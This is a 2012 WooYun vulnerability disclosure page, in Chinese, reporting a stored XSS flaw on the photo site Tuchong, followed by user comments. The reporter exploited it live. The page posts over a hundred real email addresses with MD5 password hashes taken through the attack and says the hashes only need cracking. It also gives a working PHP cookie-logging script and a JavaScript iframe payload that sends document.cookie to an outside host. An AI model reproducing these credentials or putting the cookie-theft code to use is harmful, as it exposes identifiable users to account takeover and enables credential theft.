当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011372

漏洞标题:图虫网帐户密码泄露高危啊。

相关厂商:图虫网

漏洞作者: _Evil

提交时间:2012-08-26 16:00

修复时间:2012-08-31 16:00

公开时间:2012-08-31 16:00

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-26: 细节已通知厂商并且等待厂商处理中
2012-08-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实我很想搞ajax继续传播,1传10,10传100的。 没有授权不敢。

剑心:漏洞要用数据说话的。

详细说明:

http://yf-吗晒客.com/uploads/sb.txt

email:kwspecial@gmail.com-password:88e519826c6e7f64ed83dd5f222cbf5b
email:435420828@qq.com-password:0794fdd7a3f98153a04bfbd6b3ed2e4f
email:435420828@qq.com-password:
email:932502597@qq.com-password:0794fdd7a3f98153a04bfbd6b3ed2e4f
email:372486983@qq.com-password:8983683b49b1e5117fa3775bd4ea8e71
email:-password:
email:ruixuanbai@gmail.com-password:538344bd3ab84ecf3b2a8257f4bfb69b
email:cadenza91@sina.com-password:b56f2eaa47d7bafdd427fd833831564e
email:421928578@qq.com-password:a1a4419eff3ca6dc2d3fa227d79f7382
email:popoki@foxmail.com-password:59dbc0fa881406b3ab85826ba15712fe
email:yutong180323@163.com-password:3821744b73566f2419fba2643d07a495
email:rapfish@qq.com-password:4cdae08ec4b134593960e3bac693fc26
email:2573417504@qq.com-password:e35f328b65afdf9c255216d37f2ec4ca
email:63195888@qq.com-password:7531b9818a9085dd5aa269569a955d90
email:dai_bigtree@263.net-password:1e077f0bf453bb351ccd20211c1f1c50
email:hzwsy1991@163.com-password:08e55e7ddd48424cfba1c0f07cb0a5d9
email:86073120@qq.com-password:1b30b7acdf6e5bf7ccb1a73e4a48839e
email:futureworker@gmail.com-password:f24fcf42969d71912f79bc7ff3ed8051
email:sq1022@gmail.com-password:4d7032fd1c3ee3d7054807a366d5c5ec
email:s2x0f2@gmail.com-password:a1b69e9ee73f511993cf3f2bd4043080
email:59961317@qq.com-password:ac115e77aedf3c2770aca540dbc4f842
email:939923306@qq.com-password:09b22190be57d5de15a18a494034e91a
email:jarber@yeah.net-password:9b1b83839625e011575b6728c1db7053
email:871987430@qq.com-password:dd812a2d1b9e7bbc6fdaed46e64daa53
email:vow7136@sina.com-password:c9145ec4c54a81d9e3279a13b27bf7ed
email:304825493@qq.com-password:331c2679989ba11f2357a960bdc8601e
email:orchidc@gmail.com-password:807c21c0b99b29c6de4f29c255906ee2
email:ji.cao@live.com-password:8016a3012286645575ebe3a361a63459
email:ji.cao@live.com-password:
email:jiangpeng8424@gmail.com-password:dadf5c1b59ef532717f2b14c614fe727
email:cnyouker@solidot.org-password:9bc3122074b40d9d9470ff893fdd4cc1
email:siemendracula@163.com-password:2cf4efdd0eb20af9149cd2e65eeb06f7
email:1527026511@qq.com-password:
email:huajs1980@sina.com-password:2b479a243e91a3b070d2a5e4369cad13
email:liyangrobben@vip.qq.com-password:258a4fa98d83e4776a5a0eca80312970
email:ljc199077@163.com-password:23205959aa168add4bd1dc8616d470dd
email:liupaocha@sina.com-password:1cfc8d22758737274d15c8ab4b5c5f9c
email:443900198@qq.com-password:df0dbd3845c3bc79f1a979a9fa9dc426
email:ayn715@hotmail.com-password:4c1070c7bdd8edc15f6b27d691b2a98b
email:arsenalfanye@yeah.net-password:7d8b2544edf58c5aea5d45fbc6a6d59a
email:autxlt@163.com-password:0ee5c42feab7c0f8295d393c49506582
email:lynndodo@126.com-password:0f4137ed1502b5045d6083aa258b5c42
email:circleyq@gmail.com-password:c19ac054c8a5c4e548e36383bd0b2ec7
email:117261325@qq.com-password:5585a302921b70059a618ad06c365da3
email:lhzzxa@gmail.com-password:b0567a2055f3bccc97a4ea3f27bce51b
email:334928337@qq.com-password:dc4451d61415c741db8570c378ee2b1d
email:chenhao7179@163.com-password:32c501c605a01b2b6b84cbe6dbcb7e64
email:liujunyan5615@gmail.com-password:6e528ea73c3efb6a4bdd836fd017b427
email:836912795@qq.com-password:064f08d4a4ab5f9025698803ebd98954
email:289821127@qq.com-password:da95860a9dde291249a0a02b90255962
email:449255721@qq.com-password:32186824cc871688d94a0f69f1fff996
email:349881438@qq.com-password:0bb507d15ef53588d995f10011a8163b
email:zlinetony@163.com-password:2eaea49f993994eee87171bdafce87be
email:nick_out@msn.com-password:82ee378cb20fe94bcff7d01df363b216
email:chulian198563@sina.com-password:b7569e7388e663a1512050218c66d08a
email:15117968@qq.com-password:ee606053902dd7741d5bd46f7de2b53d
email:1409321237@qq.com-password:fbbdc876f33d97146ceda5af1d31772a
email:244891344@qq.com-password:945609558c8a3995bf2030d30e2f310e
email:13822527722@139.com-password:8b471d2c07b2537791d6234d64ddee2b
email:356255531@qq.com-password:db88ae12e02d23c4e2f484aee768748c
email:jjjabc123@gmail.com-password:32546b751eb75ce027f0197f695e2f98
email:934271474@qq.com-password:b9bf338cfff10644a7708c8ce1d9ed12
email:360962152@qq.com-password:868ab18969d3f8b59c8671777f93730f
email:fxxkmsn@gmail.com-password:ac886f6f68837c4f909e56c412388285
email:314739532@qq.com-password:4404e8a76f6835e97d6db0fedd103482
email:daleq1118@hotmail.com-password:58963df817d4f28741b3c558f377b67d
email:fatjun@gmail.com-password:28331f55541279ef8950c15d16c8bdcd
email:275240479@qq.com-password:25d73c271c1dd95c54cfca9bfe3d9dfe
email:leegook@gmail.com-password:da08ee40511ad8854810365411e2269e
email:liuxv_123456789@163.com-password:b17301d76ac092e7b32a3083f74585a4
email:csy0093@sina.com-password:08ca9c5d74bf28887cbe62ae4242479f
email:cadenza91@sina.com-password:
email:1580110524@qq.com-password:92e803b2ae9581ee9a65a5bd08aac1b1
email:blueinsky_lee@hotmail.com-password:bbefeba062f816d0c68bb6b757f54f28
email:spiolynn@yahoo.cn-password:ba065b1e6e716746d83dd76392262ce4
email:andyzhang87@gmail.com-password:be9072eec6d7b4030d24712403cb549f
email:48971903@qq.com-password:78296ae4f312544e530eea6260b7983e
email:kai_e@yahoo.cn-password:8fef3f36f2d0e69a01b670511aa3d4f4
email:cao91peng@126.com-password:2309275ac43161f935b00029743c753d
email:crazylinhui@163.com-password:9643f71b3067a01dc7f3845719535482
email:29865567@qq.com-password:1cd341f93d7147a4bda6d2eac899fe1d
email:583066798@qq.com-password:8d94c6fa8db4ad63921820c6914bc66a
email:onlyzeiss@sina.cn-password:e24f4383920303ed47c71206d221085a
email:cqw1128@gmail.com-password:13cebba6d1bb0e3e70d289ff0fe4668a
email:yanzi66@hotmail.com-password:0747976ce03d81883551da99c2346b8b
email:123093299@qq.com-password:7e759aa4804fbf540b9d3a6f9cbad2b4
email:118104512@qq.com-password:3c1b8a0137db234f18c9b6dd2a37ce5d
email:lxmouseustc@163.com-password:317204bbb3b70c97e61d9af7b471f28e
email:406836126@qq.com-password:60557c6d0518db7fbba41a392b63d114
email:titanhu@qq.com-password:e7ee70e3c2f0986271eb5699693ac339
email:manxiao@vip.qq.com-password:db5efa0d7f411deb0183ebaf4b1f7c14
email:xia.dongdong@163.com-password:e0584e5ca01caea7c47c077978f88ce2
email:maple_zhifeng@yahoo.co.jp-password:e9086f624f5f1b754aaa11e6eff4c3b3
email:278415914@qq.com-password:ddd42eea9f20e367ca6ab435fcada586
email:mhxy13@gmai.com-password:437134ebf5f68fadd04121ce5a984bc5
email:181034780@qq.com-password:b78c98c650a008018e1503b38d6f3ff7
email:30601@qq.com-password:
email:dinuodefangjian@163.com-password:6b3df585bc316bf93ad05421feed7fb7
email:yanhou_liu@yahoo.com.cn-password:6c7dfe6096c793bfe593ec66dcb4ffb6
email:yzhou118@gmail.com-password:929e565875f0ff0216b35b26b64e09f8
email:lwkdota@qq.com-password:f3228715d5025ec342e95280e0f7248b
email:1255163139@qq.com-password:bbd11c7b6666e8b9fb638a69baad0672
email:hndingkai@sina.com-password:da3e7686e6d2bd6916c20bb911f90b77
email:liujianzhao@live.cn-password:33814acc0b112f9c4a7d49a407321729
email:1207397812@qq.com-password:2a42591722571f604899f3c1cc657ca0
email:niubi@asu.edu-password:1d1208991fe6d3af56e59c8b6f58d466
email:wz1758@163.com-password:06d2905af95979811ca987e3a7fdcb91
email:qianyu_wu@qq.com-password:cddea3b3655d9a56838e09c89a1ec741
email:shuanglingcom@hotmail.com-password:864752e55a1618c73fbea27df9221181
email:shuanglingcom@hotmail.com-password:
email:573724007@qq.com-password:22638a3131d0f0a7346b178fd29f939c


密码是md5解密就行了。

漏洞证明:

<html>
<head><title>90sec/title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
body{
background-image:url(http://forum.90sec.org/images/default/logo.gif);
background-attachment:fixed;
background-repeat:no-repeat;
background-color:#AFAFAF;
background-position:50% 50%;
}
</style>
</head>
<body>
</body>
</html>
<?php
$cookie = $_GET['c'];
get_pwd_and_email($cookie);
function get_pwd_and_email($cookie)
{	$get = array();
	if (!empty($cookie))
	{
		$cookie = strtr($cookie,"; ","&");
		parse_str($cookie,$get);
	    if(isset($get['email'])) $a=$get['email'];
	    if(isset($get['password']))  $b=$get['password'];
		$c="email:$a-password:$b";
		//echo "$c";
		$password_list=file('E:/vhost/wwwroot/vhost1329816067000/www/uploads/sb.txt');
		if(in_array("$c\r\n",$password_list))
		{break;}else{
		$fp=@fopen('E:/vhost/wwwroot/vhost1329816067000/www/uploads/sb.txt','a');
		@fwrite($fp,$c."\r\n");
		@fclose($fp);
		}
	}
}
?>


利用外部调用js:

<script/src=//xxxxx/1.js>


1.js代码

<iframe id="rc" width="0" height="0"></iframe><script>document.getElementById("rc").src="http://xxx/SBzhu1.php?c="+document.cookie;</script>


感谢 90sec核心 L.N帮忙优化php代码。测试没恶意,请不要介意。

修复方案:

http://www.wooyun.org/corps/%E5%9B%BE%E8%99%AB%E7%BD%91 去看看我发你的漏洞,认真修复
下。 哎。。。。。。

版权声明:转载请注明来源 _Evil@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-08-31 16:00

厂商回复:

最新状态:

2012-09-01:我之前没收到邮件阿.

漏洞评价:

评论

  1. 2012-08-26 17:16 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    尼玛,又开始邪恶了

  2. 2012-08-31 16:20 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    这个标题。。。。。直接说存储xss不就OK了么

  3. 2012-08-31 18:47 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @xsser @疯狗 加点Rank?

  4. 2012-08-31 18:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @_Evil 会加的 不急嘛

  5. 2012-08-31 18:57 | 饮恨 ( 实习白帽子 | Rank:38 漏洞数:6 | 既然选择了远方就必须日夜兼程)

    问题是上述的帐户还能登陆 @xsser

  6. 2012-09-26 21:22 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    cookies都不加密传回?我喜欢直接发邮件,然后弄个抓鸡客户端,一有消息,里面知道

  7. 2012-09-27 21:01 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    贴数据不要贴那么全啊......